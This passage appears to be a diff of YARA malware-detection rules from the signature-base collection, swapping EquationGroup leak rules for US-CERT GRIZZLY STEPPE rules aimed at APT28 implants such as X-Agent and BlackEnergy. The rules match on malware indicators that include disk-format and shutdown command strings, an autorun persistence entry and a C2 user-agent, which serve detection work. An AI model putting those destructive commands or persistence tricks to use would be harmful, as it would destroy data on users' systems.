 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846"
 
 	strings:
-		$s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" fullword wide
-		$s2 = "Unable to get TCP listen port: %08x" fullword wide
+		$obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6
+         74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2
+         E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC
+         89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE
+         9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11
+         BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D
+         CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 A4 3B }
+		$cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01
+         00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E
+         0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32
+         45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC
+         C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05
+         42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14
+         81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Lp_Mstcp : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V20 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "afa4985e-7c8f-58fc-9881-219ccba6a495"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "323ee676-802d-55e6-a97a-48eb3a4e4a5f"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2526-L2545"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L406-L423"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d1423661f95d955f411414138da45cc4be59b2e6bf8e70f471b8f41fc9ea3f4"
-		score = 75
-		quality = 83
+		logic_hash = "72c62a764c5c7c19a07957fd6fbfcffd689900cc2759d408d239fe08a3b76b9c"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd"
 
 	strings:
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s2 = "_PacketNDISRequestComplete@12\"" fullword ascii
-		$s3 = "_LDNdis5RegDeleteKeys@4" ascii
-		$op1 = { 89 7e 04 75 06 66 21 46 02 eb }
-		$op2 = { fc 74 1b 8b 49 04 0f b7 d3 66 83 }
-		$op3 = { aa 0f b7 45 fc 8b 52 04 8d 4e }
+		$func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42
+         FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1
+         8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4
+         8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45
+         D8 89 55 F8 72 A0 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $s* ) or all of ( $op* ) ) )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Renamer : FILE
+rule SIGNATURE_BASE_IMPLANT_3_V1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b5a7c8a8-c30d-5667-a458-6962a24061d3"
-		date = "2017-04-15"
+		description = "X-Agent/CHOPSTICK Implant by APT28"
+		author = "US CERT"
+		id = "d539bb31-18b2-5cf5-b994-daecd5f8c771"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2547-L2561"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L425-L442"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4941f31be6674499b202a3071d795317e6d97fb19088ea370180708e3d04bca7"
-		score = 75
+		logic_hash = "4c7b6c76bc10784abf96cc71b34ffc9a9de569fd536505528752221d22b26629"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac"
+		tags = ""
 
 	strings:
-		$s1 = "FILE_NAME_CONVERSION.LOG" fullword wide
-		$s2 = "Log file exists. You must delete it!!!" fullword wide
+		$STR1 = ">process isn't exist<" ascii wide
+		$STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide
+		$STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide
+		$STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide
+		$STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14
+         02 8a 45 ?? 03 fa}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Exploit : FILE
+rule SIGNATURE_BASE_IMPLANT_3_V2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "67a4c8b8-87fb-5f2d-a4dd-299d087c77a3"
-		date = "2017-04-15"
+		description = "X-Agent/CHOPSTICK Implant by APT28"
+		author = "US CERT"
+		id = "349c65cf-547f-5837-af71-f9721e029b74"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2563-L2579"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L444-L464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f04ec5d1066b34ebee2504f7d229610e525743f7536d58bf99fc4f89ac6aa3b"
-		score = 75
+		logic_hash = "0a658888dcc7b7f4620f08449c6ec492756750e64f15b048f7cdee7de4fc0479"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0"
 
 	strings:
-		$s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide
-		$s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide
-		$s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide
-		$s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide
+		$base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74
+         02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B
+         FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7
+         45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45
+         ?? 33 35}
+		$base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE
+         72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B
+         FF 55 8B EC 83 EC 10 A1 33 35 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Gen : FILE
+rule SIGNATURE_BASE_IMPLANT_3_V3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c479964c-3122-511d-9410-bc5d890f1489"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2581-L2600"
+		description = "X-Agent/CHOPSTICK Implant by APT28"
+		author = "US CERT"
+		id = "ce82511e-715a-53cb-98e5-5d51b94726d5"
+		date = "2017-02-10"
+		modified = "2021-03-15"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L466-L485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ba0f5ada13bd8c71836f26e278c334fdbf2578eac189852befee7a81c07e169"
-		score = 75
+		logic_hash = "313f837b90bcf09455427e4411acb5406f4dae9d69373d8d2c0cfc014e27ee96"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97"
-		hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f"
 
 	strings:
-		$s1 = "S-%u-%u" fullword ascii
-		$s2 = "Copyright (C) Microsoft" fullword wide
-		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
-		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
-		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
+		$STR1 = ".?AVAgentKernel@@"
+		$STR2 = ".?AVIAgentModule@@"
+		$STR3 = "AgentKernel"
+		$fp1 = "Panda Security S.L." wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of ( $STR* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Put_Implant9X : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "73cafd51-8b0d-59e3-966d-2f5de65953a7"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "be4d222f-009f-5dde-93da-376626a77263"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2602-L2618"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L487-L503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e79a59e400aac544dc1160d5898e3053f88f7d5bc142440177526187650484e7"
-		score = 75
+		logic_hash = "51135d9fe62f5fd1fb7ef6c386dcdd86525dd469064662c2314cfee6e952d6ec"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f"
 
 	strings:
-		$s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii
-		$op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 }
-		$op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb }
+		$STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64
+         C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF
+         32 C6 45 E0 2EE9 ?? ?? ?? ??}
+		$STR2 = {C7 45 EC 5A 00 00 00 C7 45 E0
+            46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Promiscdetect_Safe : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d6103861-b332-5c21-8408-76b512012689"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "2edaeb08-19bc-5ab4-bc75-40c16ba85d9f"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2620-L2635"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L505-L520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4b8c2e9a00af4e6aed7f603dee0439357e3389180fbd2e83d6809e76dc7d0428"
-		score = 75
+		logic_hash = "dd4edd238cdc3d376c1d5bcea6c8df57f4ef03369c0ca22107241812e0a1bb94"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847"
 
 	strings:
-		$s1 = "running on this computer!" fullword ascii
-		$s2 = "- Promiscuous (capture all packets on the network)" fullword ascii
-		$s3 = "Active filter for the adapter:" fullword ascii
+		$BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64}
+		$BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32}
+		$CONSTANT = {26 80 AC C8}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Packetscan_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V3_Alternativerule : HIGHVOL FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects a group of different malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e49695d9-15ae-53a6-955c-c68402e241a2"
-		date = "2017-04-15"
+		id = "47e9028b-7718-5372-8a1a-94c208c29ed4"
+		date = "2017-02-12"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2637-L2652"
+		reference = "US CERT Grizzly Steppe Report"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L788-L803"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa2106d2aad3e81c864181c851574f76f48cd4fe48bb3327135f2956d271dfde"
+		logic_hash = "35468f7699b96fcaaaa032eef7dae34ec314e9c652f9f8b2e8ca7343fb5cec50"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
+		comment = "Alternative rule - not based on the original samples but samples on which the original rule matched"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a"
+		hash1 = "2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a"
 
 	strings:
-		$op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff }
-		$op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 }
-		$op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 }
+		$op1 = { 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 53 1e 01 00 }
+		$op2 = { 21 da 40 00 00 a0 40 00 08 a0 40 00 b0 70 40 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+		( uint16( 0 ) == 0x5a4d and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setports : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6dc67951-714e-57d9-b34a-0006348b6b10"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "27a5fb98-fe8b-561c-b490-e04257e7dd1c"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2654-L2668"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L807-L822"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b2c61f6ca2d59d5e596e7c5c87ed3476d957763daeaf41e6f356bacf26415faf"
-		score = 75
+		logic_hash = "49c912f29f5ffbd90366a510285ef3f06c804af86829808c175c8be519ce01c4"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2"
 
 	strings:
-		$s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" fullword ascii
-		$s2 = "Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)" fullword ascii
+		$DK_format1 = "/c format %c: /Y /Q" ascii
+		$DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
+		$DK_physicaldrive = "PhysicalDrive%d" wide
+		$DK_shutdown = "shutdown /r /t %d"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5A4D and all of ( $DK* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Grdo_Filescanner_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V5 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "79a3cc02-0cda-59e2-8698-29a6cb0a3061"
-		date = "2017-04-15"
-		modified = "2023-01-06"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2670-L2686"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "d203f3c6-4e86-5632-ad5d-61763ee59bbe"
+		date = "2017-02-10"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L824-L838"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae88d27f41dd4888c445c654c919b3862fe3fc8c92aef816b22b2fb408a49cce"
-		score = 75
+		logic_hash = "9d4233ccf148919d0ad0be726b9dfa9e26a9afcebb7b26fa4db4c3da8c46d13e"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4"
 
 	strings:
-		$s1 = "system32\\winsrv.dll" fullword wide
-		$s2 = "raw_open CreateFile error" fullword ascii
-		$s3 = "\\dllcache\\" wide
+		$GEN_HASH = {0F BE C9 C1 C0 07 33 C1}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgks_Mskgu : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V7 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1692848d-a8db-5c11-9dc4-f1b0c45a78c3"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "a0dda12a-22b6-53e6-9528-8c178ad871ad"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2688-L2704"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L859-L881"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d3a230d29997ab247db2b7a2a0f369206513a98c16f744e2fb1fca6495d5e36b"
-		score = 75
+		logic_hash = "27ae70d384488660c1f80040503d3eb6541112fd6332edc5820bc6718d76b847"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09"
-		hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998"
 
 	strings:
-		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
-		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
-		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
+		$sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C}
+		$sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C}
+		$sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
+		$sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C}
+		$sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C}
+		$sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C}
+		$sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
+		$sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C}
+		$sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C}
+		$sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ifconfig_Target : FILE
+
+rule SIGNATURE_BASE_IMPLANT_4_V8
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "db8ec377-a9f6-5d75-a123-aa0365d98065"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "1e82d105-8dda-55c9-aec0-8f9f02c3a94e"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2706-L2722"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L883-L911"
